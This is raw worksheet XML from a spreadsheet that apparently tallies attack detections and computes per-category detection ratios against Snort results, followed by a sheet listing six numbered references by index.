    <row r="12">
      <c r="E12" s="233" t="s">
        <v>262</v>
      </c>
      <c r="F12" s="235">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E12,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>1</v>
      </c>
      <c r="G12" s="235">
        <v>1.0</v>
      </c>
    </row>
    <row r="13">
      <c r="E13" s="233" t="s">
        <v>450</v>
      </c>
      <c r="F13" s="235">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E13,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>0</v>
      </c>
      <c r="G13" s="235">
        <v>0.0</v>
      </c>
    </row>
    <row r="14">
      <c r="E14" s="233" t="s">
        <v>534</v>
      </c>
      <c r="F14" s="235">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E14,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>0</v>
      </c>
      <c r="G14" s="235">
        <v>0.0</v>
      </c>
    </row>
    <row r="15">
      <c r="E15" s="233" t="s">
        <v>658</v>
      </c>
      <c r="F15" s="235">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E15,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>3</v>
      </c>
      <c r="G15" s="235">
        <v>3.0</v>
      </c>
    </row>
    <row r="16">
      <c r="E16" s="233" t="s">
        <v>351</v>
      </c>
      <c r="F16" s="235">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E16,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>3</v>
      </c>
      <c r="G16" s="235">
        <v>3.0</v>
      </c>
    </row>
    <row r="17">
      <c r="E17" s="233" t="s">
        <v>397</v>
      </c>
      <c r="F17" s="235">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E17,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>0</v>
      </c>
      <c r="G17" s="235">
        <v>0.0</v>
      </c>
    </row>
    <row r="18">
      <c r="E18" s="233" t="s">
        <v>1099</v>
      </c>
      <c r="F18" s="235">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E18,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>5</v>
      </c>
      <c r="G18" s="235">
        <v>5.0</v>
      </c>
    </row>
    <row r="19">
      <c r="E19" s="233" t="s">
        <v>505</v>
      </c>
      <c r="F19" s="235">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E19,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>61</v>
      </c>
      <c r="G19" s="235">
        <v>61.0</v>
      </c>
    </row>
    <row r="20">
      <c r="E20" s="233" t="s">
        <v>1245</v>
      </c>
      <c r="F20" s="235">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E20,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>0</v>
      </c>
      <c r="G20" s="235">
        <v>0.0</v>
      </c>
    </row>
    <row r="21">
      <c r="E21" s="243" t="s">
        <v>1347</v>
      </c>
      <c r="F21" s="245">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$DT$3:$DT$133,'(B) - Detecciones - Ataques'!$B$3:$B$133,E21,'(B) - Detecciones - Ataques'!$EE$3:$EE$133,"✔")</f>
        <v>0</v>
      </c>
      <c r="G21" s="245">
        <v>0.0</v>
      </c>
    </row>
    <row r="24">
      <c r="E24" s="256" t="s">
        <v>1538</v>
      </c>
      <c r="F24" s="4"/>
      <c r="H24" s="256" t="s">
        <v>1539</v>
      </c>
      <c r="I24" s="4"/>
    </row>
    <row r="25">
      <c r="E25" s="226" t="s">
        <v>1466</v>
      </c>
      <c r="F25" s="228" t="s">
        <v>1472</v>
      </c>
      <c r="H25" s="226" t="s">
        <v>1466</v>
      </c>
      <c r="I25" s="228" t="s">
        <v>1472</v>
      </c>
    </row>
    <row r="26">
      <c r="E26" s="236" t="s">
        <v>97</v>
      </c>
      <c r="F26" s="260">
        <f>F9/'(D) - Resultados II - Snort'!V10</f>
        <v>0.6</v>
      </c>
      <c r="H26" s="236" t="s">
        <v>97</v>
      </c>
      <c r="I26" s="260">
        <f t="shared" ref="I26:I38" si="1">IF(F9=0,"-",G9/F9)</f>
        <v>1</v>
      </c>
    </row>
    <row r="27">
      <c r="E27" s="233" t="s">
        <v>204</v>
      </c>
      <c r="F27" s="262">
        <f>F10/'(D) - Resultados II - Snort'!V11</f>
        <v>1</v>
      </c>
      <c r="H27" s="233" t="s">
        <v>204</v>
      </c>
      <c r="I27" s="262">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="28">
      <c r="E28" s="233" t="s">
        <v>261</v>
      </c>
      <c r="F28" s="262">
        <f>F11/'(D) - Resultados II - Snort'!V12</f>
        <v>0.875</v>
      </c>
      <c r="H28" s="233" t="s">
        <v>261</v>
      </c>
      <c r="I28" s="262">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="29">
      <c r="E29" s="233" t="s">
        <v>262</v>
      </c>
      <c r="F29" s="262">
        <f>F12/'(D) - Resultados II - Snort'!V13</f>
        <v>0.2</v>
      </c>
      <c r="H29" s="233" t="s">
        <v>262</v>
      </c>
      <c r="I29" s="262">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="30">
      <c r="E30" s="233" t="s">
        <v>450</v>
      </c>
      <c r="F30" s="262">
        <f>F13/'(D) - Resultados II - Snort'!V14</f>
        <v>0</v>
      </c>
      <c r="H30" s="233" t="s">
        <v>450</v>
      </c>
      <c r="I30" s="262" t="str">
        <f t="shared" si="1"/>
        <v>-</v>
      </c>
    </row>
    <row r="31">
      <c r="E31" s="233" t="s">
        <v>534</v>
      </c>
      <c r="F31" s="262">
        <f>F14/'(D) - Resultados II - Snort'!V15</f>
        <v>0</v>
      </c>
      <c r="H31" s="233" t="s">
        <v>534</v>
      </c>
      <c r="I31" s="262" t="str">
        <f t="shared" si="1"/>
        <v>-</v>
      </c>
    </row>
    <row r="32">
      <c r="E32" s="233" t="s">
        <v>658</v>
      </c>
      <c r="F32" s="262">
        <f>F15/'(D) - Resultados II - Snort'!V16</f>
        <v>0.1764705882</v>
      </c>
      <c r="H32" s="233" t="s">
        <v>658</v>
      </c>
      <c r="I32" s="262">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="33">
      <c r="E33" s="233" t="s">
        <v>351</v>
      </c>
      <c r="F33" s="262">
        <f>F16/'(D) - Resultados II - Snort'!V17</f>
        <v>0.4285714286</v>
      </c>
      <c r="H33" s="233" t="s">
        <v>351</v>
      </c>
      <c r="I33" s="262">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="34">
      <c r="E34" s="233" t="s">
        <v>397</v>
      </c>
      <c r="F34" s="262">
        <f>F17/'(D) - Resultados II - Snort'!V18</f>
        <v>0</v>
      </c>
      <c r="H34" s="233" t="s">
        <v>397</v>
      </c>
      <c r="I34" s="262" t="str">
        <f t="shared" si="1"/>
        <v>-</v>
      </c>
    </row>
    <row r="35">
      <c r="E35" s="233" t="s">
        <v>1099</v>
      </c>
      <c r="F35" s="262">
        <f>F18/'(D) - Resultados II - Snort'!V19</f>
        <v>1.25</v>
      </c>
      <c r="H35" s="233" t="s">
        <v>1099</v>
      </c>
      <c r="I35" s="262">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="36">
      <c r="E36" s="233" t="s">
        <v>505</v>
      </c>
      <c r="F36" s="262">
        <f>F19/'(D) - Resultados II - Snort'!V20</f>
        <v>10.16666667</v>
      </c>
      <c r="H36" s="233" t="s">
        <v>505</v>
      </c>
      <c r="I36" s="262">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="37">
      <c r="E37" s="233" t="s">
        <v>1245</v>
      </c>
      <c r="F37" s="262">
        <f>F20/'(D) - Resultados II - Snort'!V21</f>
        <v>0</v>
      </c>
      <c r="H37" s="233" t="s">
        <v>1245</v>
      </c>
      <c r="I37" s="262" t="str">
        <f t="shared" si="1"/>
        <v>-</v>
      </c>
    </row>
    <row r="38">
      <c r="E38" s="243" t="s">
        <v>1347</v>
      </c>
      <c r="F38" s="264">
        <f>F21/'(D) - Resultados II - Snort'!V22</f>
        <v>0</v>
      </c>
      <c r="H38" s="243" t="s">
        <v>1347</v>
      </c>
      <c r="I38" s="264" t="str">
        <f t="shared" si="1"/>
        <v>-</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="E7:F7"/>
    <mergeCell ref="E24:F24"/>
    <mergeCell ref="H24:I24"/>
  </mergeCells>
  <conditionalFormatting sqref="I26:I38">
    <cfRule type="colorScale" priority="1">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="max"/>
        <color rgb="FFFFFFFF"/>
        <color rgb="FF57BB8A"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F26:F38">
    <cfRule type="colorScale" priority="2">
      <colorScale>
        <cfvo type="formula" val="0"/>
        <cfvo type="formula" val="0.5"/>
        <cfvo type="max"/>
        <color rgb="FFFFFFFF"/>
        <color rgb="FFF3BEB9"/>
        <color rgb="FFE67C73"/>
      </colorScale>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2.88"/>
    <col customWidth="1" min="4" max="4" width="23.0"/>
    <col customWidth="1" min="7" max="7" width="29.63"/>
  </cols>
  <sheetData>
    <row r="7">
      <c r="C7" s="179" t="s">
        <v>1540</v>
      </c>
      <c r="D7" s="3"/>
      <c r="E7" s="3"/>
      <c r="F7" s="3"/>
      <c r="G7" s="4"/>
      <c r="H7" s="180"/>
    </row>
    <row r="8">
      <c r="C8" s="5"/>
      <c r="D8" s="6"/>
      <c r="E8" s="6"/>
      <c r="F8" s="6"/>
      <c r="G8" s="7"/>
      <c r="H8" s="180"/>
    </row>
    <row r="11">
      <c r="C11" s="319" t="s">
        <v>1541</v>
      </c>
      <c r="D11" s="320" t="s">
        <v>1542</v>
      </c>
      <c r="E11" s="320" t="s">
        <v>5</v>
      </c>
      <c r="F11" s="320" t="s">
        <v>1543</v>
      </c>
      <c r="G11" s="321" t="s">
        <v>1544</v>
      </c>
      <c r="H11" s="21"/>
    </row>
    <row r="12" ht="66.0" customHeight="1">
      <c r="C12" s="322">
        <v>1.0</v>
      </c>
      <c r="D12" s="21" t="s">
        <v>1545</v>
      </c>
      <c r="E12" s="21">
        <v>2024.0</v>
      </c>
      <c r="F12" s="21" t="s">
        <v>1546</v>
      </c>
      <c r="G12" s="323" t="s">
        <v>1547</v>
      </c>
    </row>
    <row r="13">
      <c r="C13" s="322">
        <v>2.0</v>
      </c>
      <c r="D13" s="21" t="s">
        <v>1548</v>
      </c>
      <c r="E13" s="21">
        <v>2022.0</v>
      </c>
      <c r="F13" s="21" t="s">
        <v>1549</v>
      </c>
      <c r="G13" s="324" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="14">
      <c r="C14" s="322">
        <v>3.0</v>
      </c>
      <c r="D14" s="21" t="s">
        <v>1551</v>
      </c>
      <c r="E14" s="21">
        <v>2022.0</v>
      </c>
      <c r="F14" s="21" t="s">
        <v>1552</v>
      </c>
      <c r="G14" s="323" t="s">
        <v>1553</v>
      </c>
    </row>
    <row r="15">
      <c r="C15" s="322">
        <v>4.0</v>
      </c>
      <c r="D15" s="21" t="s">
        <v>1554</v>
      </c>
      <c r="E15" s="21">
        <v>2024.0</v>
      </c>
      <c r="F15" s="21" t="s">
        <v>1555</v>
      </c>
      <c r="G15" s="325"/>
    </row>
    <row r="16">
      <c r="C16" s="322">
        <v>5.0</v>
      </c>
      <c r="D16" s="21" t="s">
        <v>1556</v>
      </c>
      <c r="E16" s="21">
        <v>2024.0</v>
      </c>
      <c r="F16" s="21" t="s">
        <v>1557</v>
      </c>
      <c r="G16" s="325"/>
    </row>
    <row r="17">
      <c r="C17" s="326">
        <v>6.0</v>
      </c>
      <c r="D17" s="327" t="s">
        <v>1558</v>
      </c>
      <c r="E17" s="327">
        <v>2018.0</v>
      </c>
      <c r="F17" s="327" t="s">
        <v>1559</v>
      </c>
      <c r="G17" s="328" t="s">
        <v>1560</v>
      </c>
    </row>
    <row r="27">
      <c r="F27" s="1" t="s">
        <v>1561</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="21"/>
      <c r="B40" s="21"/>
      <c r="C40" s="21"/>
      <c r="D40" s="21"/>
      <c r="E40" s="21"/>
      <c r="F40" s="21"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="C7:G8"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="G12"/>
    <hyperlink r:id="rId2" ref="G13"/>
    <hyperlink r:id="rId3" ref="G14"/>
    <hyperlink r:id="rId4" ref="G17"/>
  </hyperlinks>
  <drawing r:id="rId5"/>
</worksheet>
</file>